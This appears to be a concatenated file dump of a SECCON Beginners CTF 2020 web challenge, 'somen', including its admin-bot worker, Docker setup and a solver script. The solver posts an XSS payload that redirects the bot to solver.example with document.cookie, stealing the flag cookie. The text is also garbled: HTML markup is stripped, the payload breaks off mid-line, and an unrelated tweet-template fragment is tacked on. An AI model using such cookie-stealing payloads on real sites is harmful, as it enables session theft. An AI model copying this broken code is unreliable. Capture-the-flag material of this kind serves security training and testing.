8 |
10 | Error
9 |
11 | {{ error_message }}
12 |
13 | success => true){{ source }}Error
9 |Info
24 |Please input your name. You can use only alphabets and digits.
26 |This page works fine with latest Google Chrome / Chromium. We won't support other browsers :P
27 | 28 | 32 |If your name causes suspicious behavior, please tell me that from the following form. Admin will acceess /?username=${encodeURIComponent(your input)} and see what happens.
35 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /web/somen/build/public/security.js: -------------------------------------------------------------------------------- 1 | console.log('!! security.js !!'); 2 | const username = new URL(location).searchParams.get("username"); 3 | if (username !== null && ! /^[a-zA-Z0-9]*$/.test(username)) { 4 | document.location = "/error.php"; 5 | } -------------------------------------------------------------------------------- /web/somen/build/publisher/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:8-slim 2 | 3 | WORKDIR /app 4 | 5 | ADD package.json /app/package.json 6 | ADD package-lock.json /app/package-lock.json 7 | RUN npm install 8 | 9 | RUN groupadd -r pptruser && useradd -r -g pptruser -G audio,video pptruser \ 10 | && mkdir -p /home/pptruser/Downloads \ 11 | && chown -R pptruser:pptruser /home/pptruser \ 12 | && chown -R pptruser:pptruser /app/node_modules 13 | 14 | USER pptruser 15 | 16 | ADD . /app 17 | 18 | ENTRYPOINT ["node", "publisher.js"] -------------------------------------------------------------------------------- /web/somen/build/publisher/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "publisher", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "publisher.js", 6 | "dependencies": { 7 | "body-parser": "^1.19.0", 8 | "express": "^4.16.4", 9 | "ioredis": "^4.14.1", 10 | "puppeteer": "^1.12.2", 11 | "request": "^2.88.0", 12 | "request-promise": "^4.2.4" 13 | }, 14 | "devDependencies": {}, 15 | "scripts": { 16 | "test": "echo \"Error: no test specified\" && exit 1" 17 | }, 18 | "author": "", 19 | "license": "ISC" 20 | } 21 | -------------------------------------------------------------------------------- /web/somen/build/publisher/publisher.js: -------------------------------------------------------------------------------- 1 | // set up redis 2 | const Redis = require('ioredis'); 3 | const connection = new Redis(6379, 'redis'); 4 | connection.set('queued_count', 0); 5 | connection.set('proceeded_count', 0); 6 | 7 | // set up express 8 | const app = require('express')(); 9 | const port = 8080; 10 | 11 | const bodyParser = require('body-parser'); 12 | app.use(bodyParser.urlencoded({ extended: false })) 13 | 14 | app.post('/inquiry', (req, res) => { 15 | try { 16 | if (req.body.username !== undefined && req.body.username != '') { 17 | connection.rpush('query', req.body.username).then(() => { 18 | connection.incr('queued_count') 19 | }).then(() => { 20 | console.log(`[*] Queried: ${req.body.username}`); 21 | res.send('Okay! I got it :-)'); 22 | }); 23 | } else { 24 | throw Error; 25 | } 26 | } catch (e) { 27 | res.send('Umm, there is something wrong ...'); 28 | } 29 | }); 30 | 31 | app.listen(port, () => { 32 | console.log(`Publisher is listening on port ${port}!`); 33 | }); 34 | -------------------------------------------------------------------------------- /web/somen/build/storage/logs/nginx/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SECCON/Beginners_CTF_2020/c643700479f5aefe0bf864da53b9c428f9a17439/web/somen/build/storage/logs/nginx/.gitkeep -------------------------------------------------------------------------------- /web/somen/build/worker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:8-slim 2 | 3 | RUN apt-get update && apt-get install -yq libgconf-2-4 4 | 5 | RUN apt-get update && apt-get install -y wget --no-install-recommends \ 6 | && wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - \ 7 | && sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' \ 8 | && apt-get update \ 9 | && apt-get install -y google-chrome-unstable fonts-ipafont-gothic fonts-wqy-zenhei fonts-thai-tlwg fonts-kacst ttf-freefont \ 10 | --no-install-recommends \ 11 | && rm -rf /var/lib/apt/lists/* \ 12 | && apt-get purge --auto-remove -y curl \ 13 | && rm -rf /src/*.deb 14 | 15 | ADD ./dumb-init_1.2.0_amd64 /usr/local/bin/dumb-init 16 | RUN chmod +x /usr/local/bin/dumb-init 17 | 18 | ENV PUPPETEER_SKIP_CHROMIUM_DOWNLOAD true 19 | 20 | WORKDIR /app 21 | 22 | ADD package.json /app/package.json 23 | ADD package-lock.json /app/package-lock.json 24 | RUN npm install 25 | 26 | RUN groupadd -r pptruser && useradd -r -g pptruser -G audio,video pptruser \ 27 | && mkdir -p /home/pptruser/Downloads \ 28 | && chown -R pptruser:pptruser /home/pptruser \ 29 | && chown -R pptruser:pptruser /app/node_modules 30 | 31 | USER pptruser 32 | 33 | ADD . /app 34 | 35 | ENTRYPOINT ["dumb-init", "--"] 36 | CMD ["node", "worker.js"] -------------------------------------------------------------------------------- /web/somen/build/worker/dumb-init_1.2.0_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SECCON/Beginners_CTF_2020/c643700479f5aefe0bf864da53b9c428f9a17439/web/somen/build/worker/dumb-init_1.2.0_amd64 -------------------------------------------------------------------------------- /web/somen/build/worker/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "worker", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "worker.js", 6 | "dependencies": { 7 | "ioredis": "^4.14.1", 8 | "puppeteer": "^1.12.2" 9 | }, 10 | "devDependencies": {}, 11 | "scripts": { 12 | "test": "echo \"Error: no test specified\" && exit 1" 13 | }, 14 | "author": "", 15 | "license": "ISC" 16 | } 17 | -------------------------------------------------------------------------------- /web/somen/build/worker/worker.js: -------------------------------------------------------------------------------- 1 | const puppeteer = require('puppeteer'); 2 | const Redis = require('ioredis'); 3 | const connection = new Redis(6379, 'redis'); 4 | 5 | const crawl = async (username) => { 6 | // initialize 7 | const browser = await puppeteer.launch({ 8 | executablePath: 'google-chrome-unstable', 9 | headless: true, 10 | args: [ 11 | '--no-sandbox', 12 | '--disable-background-networking', 13 | '--disk-cache-dir=/dev/null', 14 | '--disable-default-apps', 15 | '--disable-extensions', 16 | '--disable-gpu', 17 | '--disable-sync', 18 | '--disable-translate', 19 | '--hide-scrollbars', 20 | '--metrics-recording-only', 21 | '--mute-audio', 22 | '--no-first-run', 23 | '--safebrowsing-disable-auto-update', 24 | ], 25 | }); 26 | const page = await browser.newPage(); 27 | 28 | // set cookie 29 | await page.setCookie({ 30 | name: 'flag', 31 | value: process.env.FLAG, 32 | domain: process.env.DOMAIN, 33 | expires: Date.now() / 1000 + 10, 34 | }); 35 | 36 | // access 37 | const url = `${process.env.SCHEME}://${process.env.DOMAIN}/?username=${encodeURIComponent(username)}`; 38 | try { 39 | await page.goto(url, { 40 | waitUntil: 'networkidle0', 41 | timeout: 5000, 42 | }); 43 | } catch (err) { 44 | console.log(err); 45 | } 46 | 47 | // finalize 48 | await page.close(); 49 | await browser.close(); 50 | }; 51 | 52 | (async () => { 53 | while (true) { 54 | console.log("[*] waiting new query ..."); 55 | await connection.blpop("query", 0).then(v => { 56 | const username = v[1]; 57 | console.log(`[*] started: ${username}`); 58 | return crawl(username); 59 | }).then(() => { 60 | console.log(`[*] finished.`) 61 | return connection.incr("proceeded_count"); 62 | }).catch(e => { 63 | console.log(e); 64 | }); 65 | }; 66 | })(); 67 | -------------------------------------------------------------------------------- /web/somen/files/index.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 |Please input your name. You can use only alphabets and digits.
26 |This page works fine with latest Google Chrome / Chromium. We won't support other browsers :P
27 | 28 | 32 |If your name causes suspicious behavior, please tell me that from the following form. Admin will acceess /?username=${encodeURIComponent(your input)} and see what happens.
35 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /web/somen/files/worker.js: -------------------------------------------------------------------------------- 1 | const puppeteer = require('puppeteer'); 2 | 3 | /* ... ... */ 4 | 5 | // initialize 6 | const browser = await puppeteer.launch({ 7 | executablePath: 'google-chrome-unstable', 8 | headless: true, 9 | args: [ 10 | '--no-sandbox', 11 | '--disable-background-networking', 12 | '--disk-cache-dir=/dev/null', 13 | '--disable-default-apps', 14 | '--disable-extensions', 15 | '--disable-gpu', 16 | '--disable-sync', 17 | '--disable-translate', 18 | '--hide-scrollbars', 19 | '--metrics-recording-only', 20 | '--mute-audio', 21 | '--no-first-run', 22 | '--safebrowsing-disable-auto-update', 23 | ], 24 | }); 25 | const page = await browser.newPage(); 26 | 27 | // set cookie 28 | await page.setCookie({ 29 | name: 'flag', 30 | value: process.env.FLAG, 31 | domain: process.env.DOMAIN, 32 | expires: Date.now() / 1000 + 10, 33 | }); 34 | 35 | // access 36 | // username is the input value of players 37 | const url = `https://somen.quals.beginners.seccon.jp/?username=${encodeURIComponent(username)}`; 38 | try { 39 | await page.goto(url, { 40 | waitUntil: 'networkidle0', 41 | timeout: 5000, 42 | }); 43 | } catch (err) { 44 | console.log(err); 45 | } 46 | 47 | // finalize 48 | await page.close(); 49 | await browser.close(); 50 | 51 | /* ... ... */ 52 | -------------------------------------------------------------------------------- /web/somen/solver/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8.2-alpine 2 | 3 | WORKDIR /app 4 | ADD . /app 5 | 6 | RUN pip install -r requirements.txt 7 | 8 | CMD ["python", "/app/solver.py"] -------------------------------------------------------------------------------- /web/somen/solver/requirements.txt: -------------------------------------------------------------------------------- 1 | requests -------------------------------------------------------------------------------- /web/somen/solver/solver.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | from time import sleep 4 | 5 | target_url_base = "https://{}:{}".format(os.getenv("CTF4B_HOST"), 6 | os.getenv("CTF4B_PORT")) 7 | 8 | # NOTE: 9 | # before running solver, you should place following scripts somewhere (e.g. http://solver.example/record.php). 10 | # 11 | # record.php 12 | # ``` 13 | # 17 | # ``` 18 | # 19 | # view.php 20 | # ``` 21 | # 24 | # ``` 25 | 26 | # clear the record server 27 | r = requests.get("http://solver.example/record.php?q=clear") 28 | assert(r.status_code == 200) 29 | 30 | # ensure the record was cleared 31 | assert('ctf4b' not in requests.get("http://solver.example/view.php").text) 32 | 33 | # query the payload 34 | r = requests.post(target_url_base + "/inquiry", data = { 35 | "username": "document.location=`http://solver.example/record.php?q=${encodeURIComponent(document.cookie)}`;//{{ message }}
29 |{{ len .}} of 200 tweets are displayed. enjoy!
34 | 35 || link | 43 |text | 44 |Tweeted_at | 45 |
|---|---|---|
| Watch@Twitter | 49 |{{$item.Text}} | 50 |{{$item.Tweeted_at}} | 51 |